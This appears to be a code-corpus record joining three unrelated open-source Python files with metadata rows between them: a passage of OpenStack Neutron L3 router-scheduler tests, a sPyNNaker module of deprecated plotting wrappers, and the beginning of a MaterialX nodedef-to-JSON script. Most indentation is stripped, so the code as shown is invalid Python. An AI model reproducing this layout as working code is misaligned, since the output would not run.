dict(binding_index=1)),
('Delete middle binding_index',
dict(binding_index=2)),
('Delete last binding_index',
dict(binding_index=3)),
('Do not remove any bindings',
dict(binding_index=None)),
]
manual_scheduling_scenarios = [
('with manual scheduling',
dict(is_manual_scheduling=True)),
('without manual scheduling',
dict(is_manual_scheduling=False)),
]
scenarios = testscenarios.multiply_scenarios(
binding_scenarios, manual_scheduling_scenarios)
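    # Hedged note (added for illustration, not from the original source):
    # testscenarios.multiply_scenarios builds the cross product of the two
    # lists, so the 4 binding scenarios times the 2 manual-scheduling
    # scenarios yield 8 generated test variants, e.g.
    #   ('Delete first binding_index,with manual scheduling',
    #    {'binding_index': 1, 'is_manual_scheduling': True})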
def test_get_vacant_binding_index(self):
helpers.register_l3_agent('host_3')
cfg.CONF.set_override('max_l3_agents_per_router', 3)
router = self._create_ha_router()
if self.binding_index:
bindings = self.get_router_l3_agent_binding(
self.adminContext, router['id'],
binding_index=self.binding_index)
self.assertEqual(1, len(bindings))
bindings[0].delete()
vacant_binding_index = self.plugin.get_vacant_binding_index(
self.adminContext, router['id'], self.is_manual_scheduling)
if self.binding_index:
self.assertEqual(self.binding_index, vacant_binding_index)
else:
if self.is_manual_scheduling:
# If this is a manual scheduling, the user requested the
# binding so we should always provide a new one.
self.assertEqual(cfg.CONF.max_l3_agents_per_router + 1,
vacant_binding_index)
else:
# Else, we already have 3 so -1 is the 'error' value.
self.assertEqual(-1, vacant_binding_index)
class L3_HA_scheduler_db_mixinTestCase(L3HATestCaseMixin):
def _register_l3_agents(self, plugin=None):
super(L3_HA_scheduler_db_mixinTestCase,
self)._register_l3_agents(plugin=plugin)
self.agent3 = helpers.register_l3_agent(host='host_3')
self.agent_id3 = self.agent3.id
self.agent4 = helpers.register_l3_agent(host='host_4')
self.agent_id4 = self.agent4.id
def test_get_routers_l3_agents_count(self):
router1 = self._create_ha_router()
cfg.CONF.set_override('max_l3_agents_per_router', 2)
router2 = self._create_ha_router()
router3 = self._create_ha_router(ha=False)
result = self.plugin.get_routers_l3_agents_count(self.adminContext)
result += self.plugin.get_routers_l3_agents_count(
self.adminContext, ha=True)
self.assertEqual(3, len(result))
check_result = [(router['id'], agents) for router, agents in result]
self.assertIn((router1['id'], 4), check_result)
self.assertIn((router2['id'], 2), check_result)
self.assertIn((router3['id'], 0), check_result)
result = self.plugin.get_routers_l3_agents_count(self.adminContext,
ha=True, less_than=3)
check_result = [(router['id'], agents) for router, agents in result]
self.assertIn((router2['id'], 2), check_result)
def test_get_routers_not_ha_l3_agents_count(self):
router1 = self._create_ha_router(ha=False)
router2 = self._create_ha_router(ha=False)
self.plugin.schedule_router(self.adminContext, router1['id'],
candidates=[self.agent1])
result = self.plugin.get_routers_l3_agents_count(self.adminContext)
self.assertEqual(2, len(result))
check_result = [(router['id'], agents) for router, agents in result]
self.assertIn((router1['id'], 1), check_result)
self.assertIn((router2['id'], 0), check_result)
result = self.plugin.get_routers_l3_agents_count(self.adminContext,
less_than=1)
check_result = [(router['id'], agents) for router, agents in result]
self.assertIn((router2['id'], 0), check_result)
self.assertNotIn((router1['id'], 1), check_result)
def test_get_ordered_l3_agents_by_num_routers(self):
# Mock scheduling so that the test can control it explicitly
mock.patch.object(l3_hamode_db.L3_HA_NAT_db_mixin,
'_notify_router_updated').start()
with mock.patch.object(self.plugin, 'schedule_router'):
router1 = self._create_ha_router()
router2 = self._create_ha_router()
router3 = self._create_ha_router(ha=False)
router4 = self._create_ha_router(ha=False)
# Agent 1 will host 0 routers, agent 2 will host 1, agent 3 will
# host 2, and agent 4 will host 3.
self.plugin.schedule_router(self.adminContext, router1['id'],
candidates=[self.agent2, self.agent4])
self.plugin.schedule_router(self.adminContext, router2['id'],
candidates=[self.agent3, self.agent4])
self.plugin.schedule_router(self.adminContext, router3['id'],
candidates=[self.agent3])
self.plugin.schedule_router(self.adminContext, router4['id'],
candidates=[self.agent4])
agent_ids = [self.agent_id1, self.agent_id2, self.agent_id3,
self.agent_id4]
result = self.plugin.get_l3_agents_ordered_by_num_routers(
self.adminContext, agent_ids)
self.assertEqual(agent_ids, [record['id'] for record in result])
class L3AgentSchedulerDbMixinTestCase(L3HATestCaseMixin):
def _setup_ha_router(self):
router = self._create_ha_router()
agents = self._get_agents_scheduled_for_router(router)
return router, agents
def test_reschedule_ha_routers_from_down_agents(self):
agents = self._setup_ha_router()[1]
self.assertEqual(2, len(agents))
self._set_l3_agent_dead(self.agent_id1)
with mock.patch.object(self.plugin, 'reschedule_router') as reschedule:
self.plugin.reschedule_routers_from_down_agents()
self.assertFalse(reschedule.called)
def test_list_l3_agents_hosting_ha_router(self):
router = self._create_ha_router()
agents = self.plugin.list_l3_agents_hosting_router(
self.adminContext, router['id'])['agents']
for agent in agents:
self.assertEqual('standby', agent['ha_state'])
self.plugin.update_routers_states(
self.adminContext, {router['id']: 'active'}, self.agent1.host)
agents = self.plugin.list_l3_agents_hosting_router(
self.adminContext, router['id'])['agents']
for agent in agents:
expected_state = ('active' if agent['host'] == self.agent1.host
else 'standby')
self.assertEqual(expected_state, agent['ha_state'])
def test_list_l3_agents_hosting_legacy_router(self):
router = self._create_ha_router(ha=False)
self.plugin.schedule_router(self.adminContext, router['id'])
agent = self.plugin.list_l3_agents_hosting_router(
self.adminContext, router['id'])['agents'][0]
self.assertIsNone(agent['ha_state'])
def test_get_agents_dict_for_router_unscheduled_returns_empty_list(self):
self.assertEqual({'agents': []},
self.plugin._get_agents_dict_for_router([]))
def test_router_doesnt_support_scheduling(self):
with mock.patch.object(self.plugin, 'router_supports_scheduling',
return_value=False):
agent = helpers.register_l3_agent(host='myhost_3')
with testtools.ExpectedException(
l3agent.RouterDoesntSupportScheduling):
self.plugin.add_router_to_l3_agent(
self.adminContext, agent.id, 'router_id')
def test_manual_add_ha_router_to_agent(self):
cfg.CONF.set_override('max_l3_agents_per_router', 2)
router, agents = self._setup_ha_router()
self.assertEqual(2, len(agents))
agent = helpers.register_l3_agent(host='myhost_3')
        # We allow exceeding max_l3_agents_per_router via manual scheduling
self.plugin.add_router_to_l3_agent(
self.adminContext, agent.id, router['id'])
agents = self._get_agents_scheduled_for_router(router)
self.assertIn(agent.id, [_agent.id for _agent in agents])
self.assertEqual(3, len(agents))
def test_manual_remove_ha_router_from_agent(self):
router, agents = self._setup_ha_router()
self.assertEqual(2, len(agents))
agent = agents.pop()
# Remove router from agent and make sure it is removed
self.plugin.remove_router_from_l3_agent(
self.adminContext, agent.id, router['id'])
agents = self._get_agents_scheduled_for_router(router)
self.assertEqual(1, len(agents))
self.assertNotIn(agent.id, [_agent.id for _agent in agents])
def test_manual_remove_ha_router_from_all_agents(self):
router, agents = self._setup_ha_router()
self.assertEqual(2, len(agents))
agent = agents.pop()
self.plugin.remove_router_from_l3_agent(
self.adminContext, agent.id, router['id'])
agent = agents.pop()
self.plugin.remove_router_from_l3_agent(
self.adminContext, agent.id, router['id'])
agents = self._get_agents_scheduled_for_router(router)
self.assertEqual(0, len(agents))
def _get_agents_scheduled_for_router(self, router):
return self.plugin.get_l3_agents_hosting_routers(
self.adminContext, [router['id']],
admin_state_up=True)
def test_delete_ha_interfaces_from_agent(self):
router, agents = self._setup_ha_router()
agent = agents.pop()
self.plugin.remove_router_from_l3_agent(
self.adminContext, agent.id, router['id'])
objs = l3_hamode.L3HARouterAgentPortBinding.get_objects(
self.adminContext, router_id=router['id'])
results = [binding.l3_agent_id for binding in objs]
self.assertNotIn(agent.id, results)
def test_add_ha_interface_to_l3_agent(self):
agent = self.plugin.get_agent_objects(self.adminContext)[0]
router = self._create_ha_router()
self.plugin.add_router_to_l3_agent(self.adminContext, agent.id,
router['id'])
# Verify agent has HA interface
ha_ports = self.plugin.get_ha_router_port_bindings(self.adminContext,
[router['id']])
self.assertIn(agent.id, [ha_port.l3_agent_id for ha_port in ha_ports])
def test_schedule_routers_unique_binding_indices(self):
cfg.CONF.set_override('max_l3_agents_per_router', 2)
router = self._create_ha_router()
bindings = self.get_router_l3_agent_binding(self.adminContext,
router['id'])
binding_indices = [binding.binding_index for binding in bindings]
self.assertEqual(list(range(1, cfg.CONF.max_l3_agents_per_router + 1)),
binding_indices)
def test_bind_router_twice_for_non_ha(self):
router = self._create_ha_router(ha=False)
self.plugin.router_scheduler.bind_router(self.plugin,
self.adminContext,
router['id'],
self.agent_id1)
self.plugin.router_scheduler.bind_router(self.plugin,
self.adminContext,
router['id'],
self.agent_id2)
# Make sure the second bind_router call didn't schedule the router to
# more agents than allowed.
agents = self.plugin.get_l3_agents_hosting_routers(self.adminContext,
[router['id']])
self.assertEqual(1, len(agents))
        # Moreover, make sure that the agent that did get bound only got
        # bound once.
bindings = self.get_router_l3_agent_binding(
self.adminContext, router['id'], l3_agent_id=agents[0]['id'])
self.assertEqual(1, len(bindings))
class L3HAChanceSchedulerTestCase(L3HATestCaseMixin):
def test_scheduler_with_ha_enabled(self):
router = self._create_ha_router()
agents = self.plugin.get_l3_agents_hosting_routers(
self.adminContext, [router['id']],
admin_state_up=True)
self.assertEqual(2, len(agents))
for agent in agents:
sync_data = self.plugin.get_ha_sync_data_for_host(
self.adminContext, router_ids=[router['id']],
host=agent.host, agent=agent)
self.assertEqual(1, len(sync_data))
interface = sync_data[0][constants.HA_INTERFACE_KEY]
self.assertIsNotNone(interface)
def test_auto_schedule(self):
# Mock scheduling so that the test can control it explicitly
mock.patch.object(l3_hamode_db.L3_HA_NAT_db_mixin,
'_notify_router_updated').start()
router = self._create_ha_router()
self.plugin.auto_schedule_routers(self.adminContext, self.agent1.host)
self.plugin.auto_schedule_routers(self.adminContext, self.agent2.host)
agents = self.plugin.get_l3_agents_hosting_routers(
self.adminContext, [router['id']])
self.assertEqual(2, len(agents))
def test_auto_schedule_specific_router_when_agent_added(self):
self._auto_schedule_when_agent_added(True)
def test_auto_schedule_all_routers_when_agent_added(self):
self._auto_schedule_when_agent_added(False)
def test_auto_schedule_ha_router_when_incompatible_agent_exist(self):
handle_internal_only_routers_agent = helpers.register_l3_agent(
'host_3', constants.L3_AGENT_MODE_LEGACY, internal_only=False)
router = self._create_ha_router()
self.plugin.auto_schedule_routers(
self.adminContext, handle_internal_only_routers_agent.host)
agents = self.plugin.get_l3_agents_hosting_routers(
self.adminContext, [router['id']],
admin_state_up=True)
agent_ids = [agent['id'] for agent in agents]
self.assertEqual(2, len(agents))
self.assertNotIn(handle_internal_only_routers_agent.id, agent_ids)
def test_auto_schedule_ha_router_when_dvr_agent_exist(self):
dvr_agent = helpers.register_l3_agent(
HOST_DVR, constants.L3_AGENT_MODE_DVR)
router = self._create_ha_router()
self.plugin.auto_schedule_routers(self.adminContext, dvr_agent.host)
agents = self.plugin.get_l3_agents_hosting_routers(
self.adminContext, [router['id']],
admin_state_up=True)
agent_ids = [agent['id'] for agent in agents]
self.assertEqual(2, len(agents))
self.assertNotIn(dvr_agent.id, agent_ids)
def _auto_schedule_when_agent_added(self, specific_router):
router = self._create_ha_router()
agents = self.plugin.get_l3_agents_hosting_routers(
self.adminContext, [router['id']],
admin_state_up=True)
self.assertEqual(2, len(agents))
agent_ids = [agent['id'] for agent in agents]
self.assertIn(self.agent_id1, agent_ids)
self.assertIn(self.agent_id2, agent_ids)
agent = helpers.register_l3_agent(host='host_3')
self.agent_id3 = agent.id
self.plugin.auto_schedule_routers(self.adminContext, 'host_3')
agents = self.plugin.get_l3_agents_hosting_routers(
self.adminContext, [router['id']],
admin_state_up=True)
self.assertEqual(3, len(agents))
# Simulate agent restart to make sure we don't try to re-bind
self.plugin.auto_schedule_routers(self.adminContext, 'host_3')
class L3HALeastRoutersSchedulerTestCase(L3HATestCaseMixin):
def _register_l3_agents(self, plugin=None):
super(L3HALeastRoutersSchedulerTestCase,
self)._register_l3_agents(plugin=plugin)
agent = helpers.register_l3_agent(host='host_3')
self.agent_id3 = agent.id
agent = helpers.register_l3_agent(host='host_4')
self.agent_id4 = agent.id
def setUp(self):
super(L3HALeastRoutersSchedulerTestCase, self).setUp()
self.plugin.router_scheduler = importutils.import_object(
'neutron.scheduler.l3_agent_scheduler.LeastRoutersScheduler'
)
def test_scheduler(self):
cfg.CONF.set_override('max_l3_agents_per_router', 2)
        # Disable the third and fourth agents to be sure that the router
        # will be scheduled to one of the first two agents.
self._set_l3_agent_admin_state(self.adminContext,
self.agent_id3, False)
self._set_l3_agent_admin_state(self.adminContext,
self.agent_id4, False)
r1 = self._create_ha_router()
agents = self.plugin.get_l3_agents_hosting_routers(
self.adminContext, [r1['id']],
admin_state_up=True)
self.assertEqual(2, len(agents))
agent_ids = [agent['id'] for agent in agents]
self.assertIn(self.agent_id1, agent_ids)
self.assertIn(self.agent_id2, agent_ids)
self._set_l3_agent_admin_state(self.adminContext,
self.agent_id3, True)
self._set_l3_agent_admin_state(self.adminContext,
self.agent_id4, True)
r2 = self._create_ha_router()
agents = self.plugin.get_l3_agents_hosting_routers(
self.adminContext, [r2['id']],
admin_state_up=True)
self.assertEqual(2, len(agents))
agent_ids = [agent['id'] for agent in agents]
self.assertIn(self.agent_id3, agent_ids)
self.assertIn(self.agent_id4, agent_ids)
class TestGetL3AgentsWithFilter(testlib_api.SqlTestCase,
L3SchedulerBaseMixin):
"""Test cases to test get_l3_agents.
6 l3 agents are registered in the order - legacy, dvr_snat, dvr,
dvr_no_external, fake_mode and legacy
"""
scenarios = [
('no filter',
dict(agent_modes=[],
host=['host_1'],
expected_agent_modes=['legacy', 'dvr_snat', 'dvr',
'dvr_no_external', 'fake_mode',
'legacy'],
expected_host=['host_1'])),
('legacy',
dict(agent_modes=['legacy'],
host=['host_1'],
expected_agent_modes=['legacy', 'legacy'],
expected_host=['host_1'])),
('dvr_snat',
dict(agent_modes=['dvr_snat'],
host=['host_2'],
expected_agent_modes=['dvr_snat'],
expected_host=['host_2'])),
('dvr',
dict(agent_modes=['dvr'],
host=['host_3'],
expected_agent_modes=['dvr'],
expected_host=['host_3'])),
('dvr_no_external',
dict(agent_modes=['dvr_no_external'],
host=['host_4'],
expected_agent_modes=['dvr_no_external'],
expected_host=['host_4'])),
('dvr_snat and dvr',
dict(agent_modes=['dvr_snat', 'dvr'],
host=['host_5'],
expected_agent_modes=['dvr_snat', 'dvr'],
expected_host=['host_5'])),
('dvr_snat and dvr_no_external',
dict(agent_modes=['dvr_snat', 'dvr_no_external'],
host=['host_5'],
expected_agent_modes=['dvr_snat', 'dvr_no_external'],
expected_host=['host_5'])),
('dvr_snat, dvr and dvr_no_external',
dict(agent_modes=['dvr_snat', 'dvr', 'dvr_no_external'],
host=['host_6'],
expected_agent_modes=['dvr_snat', 'dvr', 'dvr_no_external'],
expected_host=['host_6'])),
('invalid',
dict(agent_modes=['invalid'],
host=['host_invalid'],
expected_agent_modes=[],
expected_host=[])),
]
def setUp(self):
super(TestGetL3AgentsWithFilter, self).setUp()
self.plugin = L3HAPlugin()
self.setup_coreplugin('ml2')
self.adminContext = n_context.get_admin_context()
hosts = ['host_1', 'host_2', 'host_3', 'host_4', 'host_5', 'host_6']
agent_modes = ['legacy', 'dvr_snat', 'dvr', 'dvr_no_external',
'fake_mode', 'legacy']
for host, agent_mode in zip(hosts, agent_modes):
helpers.register_l3_agent(host, agent_mode)
class TestGetL3AgentsWithAgentModeFilter(TestGetL3AgentsWithFilter):
"""Test cases to test get_l3_agents 'agent_mode'.
This class tests the L3AgentSchedulerDbMixin.get_l3_agents()
for the 'agent_mode' filter with various values.
"""
def _get_agent_mode(self, agent):
agent_conf = self.plugin.get_configuration_dict(agent)
return agent_conf.get('agent_mode', 'None')
def test_get_l3_agents(self):
l3_agents = self.plugin.get_l3_agents(
self.adminContext, filters={'agent_modes': self.agent_modes})
self.assertEqual(len(self.expected_agent_modes), len(l3_agents))
returned_agent_modes = [self._get_agent_mode(agent)
for agent in l3_agents]
self.assertCountEqual(self.expected_agent_modes, returned_agent_modes)
class TestGetL3AgentsWithHostFilter(TestGetL3AgentsWithFilter):
"""Test cases to test get_l3_agents 'hosts'.
This class tests the L3AgentSchedulerDbMixin.get_l3_agents()
for the 'host' filter with various values.
"""
def _get_host(self, agent):
return agent.get('host', 'None')
def test_get_l3_agents(self):
l3_agents = self.plugin.get_l3_agents(
self.adminContext, filters={'host': self.host})
self.assertEqual(len(self.expected_host), len(l3_agents))
returned_host = [self._get_host(agent)
for agent in l3_agents]
self.assertEqual(self.expected_host, returned_host)
class L3AgentAZLeastRoutersSchedulerTestCase(L3HATestCaseMixin):
def setUp(self):
super(L3AgentAZLeastRoutersSchedulerTestCase, self).setUp()
self.plugin.router_scheduler = importutils.import_object(
'neutron.scheduler.l3_agent_scheduler.AZLeastRoutersScheduler')
# Mock scheduling so that the test can control it explicitly
mock.patch.object(l3_hamode_db.L3_HA_NAT_db_mixin,
'_notify_router_updated').start()
# Removes MissingAuthPlugin exception from logs
self.patch_notifier = mock.patch(
'neutron.notifiers.batch_notifier.BatchNotifier._notify')
self.patch_notifier.start()
# Extend network HA extension.
rname = network_ha.COLLECTION_NAME
attributes.RESOURCES[rname].update(
network_ha.RESOURCE_ATTRIBUTE_MAP[rname])
def _register_l3_agents(self):
self.agent1 = helpers.register_l3_agent(host='az1-host1', az='az1')
self.agent2 = helpers.register_l3_agent(host='az1-host2', az='az1')
self.agent3 = helpers.register_l3_agent(host='az2-host1', az='az2')
self.agent4 = helpers.register_l3_agent(host='az2-host2', az='az2')
self.agent5 = helpers.register_l3_agent(host='az3-host1', az='az3')
self.agent6 = helpers.register_l3_agent(host='az3-host2', az='az3')
def test_az_scheduler_auto_schedule(self):
r1 = self._create_ha_router(ha=False, az_hints=['az1'])
self.plugin.auto_schedule_routers(self.adminContext, 'az1-host2')
agents = self.plugin.get_l3_agents_hosting_routers(
self.adminContext, [r1['id']])
self.assertEqual(1, len(agents))
self.assertEqual('az1-host2', agents[0]['host'])
def test_az_scheduler_auto_schedule_no_match(self):
r1 = self._create_ha_router(ha=False, az_hints=['az1'])
self.plugin.auto_schedule_routers(self.adminContext, 'az2-host1')
agents = self.plugin.get_l3_agents_hosting_routers(
self.adminContext, [r1['id']])
self.assertEqual(0, len(agents))
def test_az_scheduler_default_az(self):
cfg.CONF.set_override('default_availability_zones', ['az2'])
r1 = self._create_ha_router(ha=False)
r2 = self._create_ha_router(ha=False)
r3 = self._create_ha_router(ha=False)
self.plugin.schedule_router(self.adminContext, r1['id'])
self.plugin.schedule_router(self.adminContext, r2['id'])
self.plugin.schedule_router(self.adminContext, r3['id'])
agents = self.plugin.get_l3_agents_hosting_routers(
self.adminContext, [r1['id'], r2['id'], r3['id']])
self.assertEqual(3, len(agents))
expected_hosts = set(['az2-host1', 'az2-host2'])
hosts = set([a['host'] for a in agents])
self.assertEqual(expected_hosts, hosts)
def test_az_scheduler_az_hints(self):
r1 = self._create_ha_router(ha=False, az_hints=['az3'])
r2 = self._create_ha_router(ha=False, az_hints=['az3'])
r3 = self._create_ha_router(ha=False, az_hints=['az3'])
self.plugin.schedule_router(self.adminContext, r1['id'])
self.plugin.schedule_router(self.adminContext, r2['id'])
self.plugin.schedule_router(self.adminContext, r3['id'])
agents = self.plugin.get_l3_agents_hosting_routers(
self.adminContext, [r1['id'], r2['id'], r3['id']])
self.assertEqual(3, len(agents))
expected_hosts = set(['az3-host1', 'az3-host2'])
hosts = set([a['host'] for a in agents])
self.assertEqual(expected_hosts, hosts)
def test_az_scheduler_least_routers(self):
r1 = self._create_ha_router(ha=False, az_hints=['az1'])
r2 = self._create_ha_router(ha=False, az_hints=['az1'])
r3 = self._create_ha_router(ha=False, az_hints=['az1'])
r4 = self._create_ha_router(ha=False, az_hints=['az1'])
self.plugin.schedule_router(self.adminContext, r1['id'])
self.plugin.schedule_router(self.adminContext, r2['id'])
self.plugin.schedule_router(self.adminContext, r3['id'])
self.plugin.schedule_router(self.adminContext, r4['id'])
agents = self.plugin.get_l3_agents_hosting_routers(
self.adminContext, [r1['id'], r2['id'], r3['id'], r4['id']])
host_num = collections.defaultdict(int)
for agent in agents:
host_num[agent['host']] += 1
self.assertEqual(2, host_num['az1-host1'])
self.assertEqual(2, host_num['az1-host2'])
def test_az_scheduler_ha_az_hints(self):
cfg.CONF.set_override('max_l3_agents_per_router', 2)
r1 = self._create_ha_router(az_hints=['az1', 'az3'])
self.plugin.schedule_router(self.adminContext, r1['id'])
agents = self.plugin.get_l3_agents_hosting_routers(
self.adminContext, [r1['id']])
self.assertEqual(2, len(agents))
expected_azs = set(['az1', 'az3'])
azs = set([a['availability_zone'] for a in agents])
self.assertEqual(expected_azs, azs)
def test_az_scheduler_ha_auto_schedule(self):
cfg.CONF.set_override('max_l3_agents_per_router', 3)
self._set_l3_agent_admin_state(self.adminContext, self.agent2['id'],
state=False)
self._set_l3_agent_admin_state(self.adminContext, self.agent6['id'],
state=False)
r1 = self._create_ha_router(az_hints=['az1', 'az3'])
self.plugin.schedule_router(self.adminContext, r1['id'])
agents = self.plugin.get_l3_agents_hosting_routers(
self.adminContext, [r1['id']])
self.assertEqual(2, len(agents))
hosts = set([a['host'] for a in agents])
self.assertEqual(set(['az1-host1', 'az3-host1']), hosts)
self._set_l3_agent_admin_state(self.adminContext, self.agent6['id'],
state=True)
self.plugin.auto_schedule_routers(self.adminContext, 'az3-host2')
agents = self.plugin.get_l3_agents_hosting_routers(
self.adminContext, [r1['id']])
self.assertEqual(3, len(agents))
expected_hosts = set(['az1-host1', 'az3-host1', 'az3-host2'])
hosts = set([a['host'] for a in agents])
self.assertEqual(expected_hosts, hosts)
def test__get_routers_can_schedule_with_no_target_routers(self):
result = self.plugin.router_scheduler._get_routers_can_schedule(
self.plugin, mock.ANY, [], mock.ANY)
self.assertEqual([], result)
class L3DVRHAPlugin(db_v2.NeutronDbPluginV2,
l3_hamode_db.L3_HA_NAT_db_mixin,
l3_dvr_ha_scheduler_db.L3_DVR_HA_scheduler_db_mixin):
pass
class L3DVRHATestCaseMixin(testlib_api.SqlTestCase,
L3SchedulerBaseMixin):
def setUp(self):
super(L3DVRHATestCaseMixin, self).setUp()
self.adminContext = n_context.get_admin_context()
self.plugin = L3DVRHAPlugin()
|
1ed39b707fdf117366e1b24952dc57ab864f3f3f
|
3eb3c4046b17e265930aaf89fa93f41896f243cb
|
/spynnaker8/spynnaker_plotting.py
|
f7fcd0b8b7a86cd9502ebf7dded0e35d88a3526b
|
[
"Apache-2.0"
] |
permissive
|
SpiNNakerManchester/sPyNNaker
|
b177613a114cfc7e7687ec36c1f72a2f07f66977
|
891cfb3046f66185fd8df52d270380fa94c32eab
|
refs/heads/master
| 2023-09-01T11:28:21.252266
| 2023-08-17T08:07:43
| 2023-08-17T08:07:43
| 20,801,613
| 101
| 53
|
Apache-2.0
| 2023-09-14T18:39:29
| 2014-06-13T11:07:19
|
Python
|
UTF-8
|
Python
| false
| false
| 4,167
|
py
|
spynnaker_plotting.py
|
# Copyright (c) 2021 The University of Manchester
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import spynnaker.spynnaker_plotting as new_plotting
from spynnaker.spynnaker_plotting import SpynnakerPanel as _BaseClass
from spynnaker.pyNN.utilities.utility_calls import moved_in_v6
def plot_spiketrains(axes, spiketrains, label='', **options):
"""
Plot all spike trains in a Segment in a raster plot.
.. deprecated:: 6.0
Use
:py:class:`spynnaker.spynnaker_plotting` instead.
:param ~matplotlib.axes.Axes axes: An Axes in a matplotlib figure
:param list(~neo.core.SpikeTrain) spiketrains: List of spike times
:param str label: Label for the graph
:param options: plotting options
"""
moved_in_v6(
"spynnaker8.spynnaker_plotting", "spynnaker.spynnaker_plotting")
new_plotting.plot_spiketrains(axes, spiketrains, label, **options)
def plot_spikes_numpy(axes, spikes, label='', **options):
"""
Plot all spikes.
.. deprecated:: 6.0
Use
:py:class:`spynnaker.spynnaker_plotting` instead.
:param ~matplotlib.axes.Axes axes: An Axes in a matplotlib figure
    :param ~numpy.ndarray spikes: spynnaker7 format numpy array of spikes
:param str label: Label for the graph
:param options: plotting options
"""
moved_in_v6(
"spynnaker8.spynnaker_plotting", "spynnaker.spynnaker_plotting")
new_plotting.plot_spikes_numpy(axes, spikes, label, **options)
def heat_plot_numpy(axes, data, label='', **options):
"""
Plots neurons, times and values into a heatmap.
.. deprecated:: 6.0
Use
:py:class:`spynnaker.spynnaker_plotting` instead.
:param ~matplotlib.axes.Axes axes: An Axes in a matplotlib figure
:param ~numpy.ndarray data: numpy array of values in spynnaker7 format
:param str label: Label for the graph
:param options: plotting options
"""
moved_in_v6(
"spynnaker8.spynnaker_plotting", "spynnaker.spynnaker_plotting")
new_plotting.heat_plot_numpy(axes, data, label, **options)
def heat_plot_neo(axes, signal_array, label='', **options):
"""
Plots neurons, times and values into a heatmap.
.. deprecated:: 6.0
Use
:py:class:`spynnaker.spynnaker_plotting` instead.
:param ~matplotlib.axes.Axes axes: An Axes in a matplotlib figure
:param ~neo.core.AnalogSignal signal_array: Neo Signal array Object
:param str label: Label for the graph
:param options: plotting options
"""
moved_in_v6(
"spynnaker8.spynnaker_plotting", "spynnaker.spynnaker_plotting")
new_plotting.heat_plot_neo(axes, signal_array, label, **options)
def plot_segment(axes, segment, label='', **options):
"""
Plots a segment into a plot of spikes or a heatmap.
.. deprecated:: 6.0
Use
:py:class:`spynnaker.spynnaker_plotting` instead.
:param ~matplotlib.axes.Axes axes: An Axes in a matplotlib figure
:param ~neo.core.Segment segment: Data for one run to plot
:param str label: Label for the graph
:param options: plotting options
"""
moved_in_v6(
"spynnaker8.spynnaker_plotting", "spynnaker.spynnaker_plotting")
new_plotting.plot_segment(axes, segment, label, **options)
class SpynnakerPanel(_BaseClass):
"""
Represents a single panel in a multi-panel figure.
.. deprecated:: 6.0
Use
:py:class:`spynnaker.spynnaker_plotting` instead.
"""
def __init__(self, *data, **options):
moved_in_v6(
"spynnaker8.spynnaker_plotting", "spynnaker.spynnaker_plotting")
super(SpynnakerPanel, self).__init__(*data, **options)
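# Hedged usage sketch (added for illustration; `Figure` and the segment data
# are assumed to be provided by the caller, as in pyNN-style plotting scripts):
#     panel = SpynnakerPanel(segment.spiketrains, yticks=True, xlabel="Time (ms)")
#     Figure(panel, title="Spikes")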
|
0bdd5893618fe96521235205e4411f76a5594bdb
|
098bdd84c5c13c1c750bd66848d3cc394a2f4da3
|
/contrib/adsk/MaterialX/Utilities/Scripts/mxnodedefconvert.py
|
32b08da4b9e85ff80341a2022462f639dd4475b4
|
[
"Apache-2.0"
] |
permissive
|
autodesk-forks/MaterialX
|
0526c4cdd36cc4d0f0e1773b6833da2f28f53b84
|
f6fdb68d9929fa26458161718c6b26dd69f246de
|
refs/heads/adsk_contrib/dev
| 2023-08-17T03:00:13.163418
| 2023-07-24T17:35:14
| 2023-07-24T17:35:14
| 99,679,762
| 110
| 25
|
Apache-2.0
| 2023-09-13T05:14:38
| 2017-08-08T10:16:05
|
Mathematica
|
UTF-8
|
Python
| false
| false
| 10,807
|
py
|
mxnodedefconvert.py
|
#!/usr/bin/env python
"""
Utility to generate JSON and hpp from a MaterialX nodedef.
Given a nodedef, e.g. ND_standard_surface_surfaceshader, it will
generate a standard_surface.json and standard_surface.hpp.
The hpp/json can be used for simple reflection instead
of parsing the mtlx libraries.
"""
import sys
import os
import argparse
import json
import hashlib
import MaterialX as mx
INPUTFILEHASH = 0
mx_stdTypes = {
'color3': ['MaterialX::Color3', mx.Color3(1, 1, 1)],
'color4': ['MaterialX::Color4', mx.Color4(1, 1, 1, 1)],
'vector4': ['MaterialX::Vector4', mx.Vector4(1, 1, 1, 1)],
'vector3': ['MaterialX::Vector3', mx.Vector3(1, 1, 1)],
'vector2': ['MaterialX::Vector2', mx.Vector2(1, 1)],
'matrix33': ['MaterialX::Matrix33', None],
'matrix44': ['MaterialX::Matrix44', None],
'integerarray': ['std::vector<int>', None],
'floatarray': ['std::vector<float>', None],
'color3array': ['std::vector<MaterialX::Color3>', None],
'color4array': ['std::vector<MaterialX::Color4>', None],
'vector2array': ['std::vector<MaterialX::Vector2>', None],
'vector3array': ['std::vector<MaterialX::Vector3>', None],
'vector4array': ['std::vector<MaterialX::Vector4>', None],
'stringarray': ['std::vector<std::string>', None],
'boolean': ['bool', False],
'integer': ['int', 0],
'file': ['std::string', ""],
'filename': ['std::string', ""],
'string': ['std::string', ""],
'float': ['float', 0],
#TODO: create custom structs (fixme)
'lightshader': ['lightshader', None],
'volumeshader': ['volumeshader', None],
'displacementshader': ['displacementshader', None],
'surfaceshader': ['surfaceshader', None],
'BSDF': ['BSDF', None],
'EDF': ['EDF', None],
'VDF': ['VDF', None],
}
def _getType(mxType):
return mx_stdTypes[mxType][0]
def _getDefault(mxType):
return mx_stdTypes[mxType][1]
# Compute gitHash
def _computeGitHash(mtlxfile):
with open(mtlxfile, 'r') as afile:
buf = afile.read().encode()
hasher = hashlib.sha1()
hasher.update(b"blob %u\0" % len(buf))
hasher.update(buf)
return hasher.hexdigest()
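# Hedged note (added comment): this reproduces git's blob hashing, i.e.
# sha1(b"blob <size>\0" + content), so for the same bytes the digest should
# match `git hash-object <file>` (assuming no newline translation on read).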
def main():
parser = argparse.ArgumentParser(
description="MaterialX nodedef to json/hpp converter.")
parser.add_argument(dest="inputFilename",
help="Filename of the input document.")
parser.add_argument("--node", dest="nodedef", type=str,
help="Node to export")
parser.add_argument("--stdlib", dest="stdlib", action="store_true",
help="Import standard MaterialX libraries into the document.")
opts = parser.parse_args()
doc = mx.createDocument()
try:
mx.readFromXmlFile(doc, opts.inputFilename)
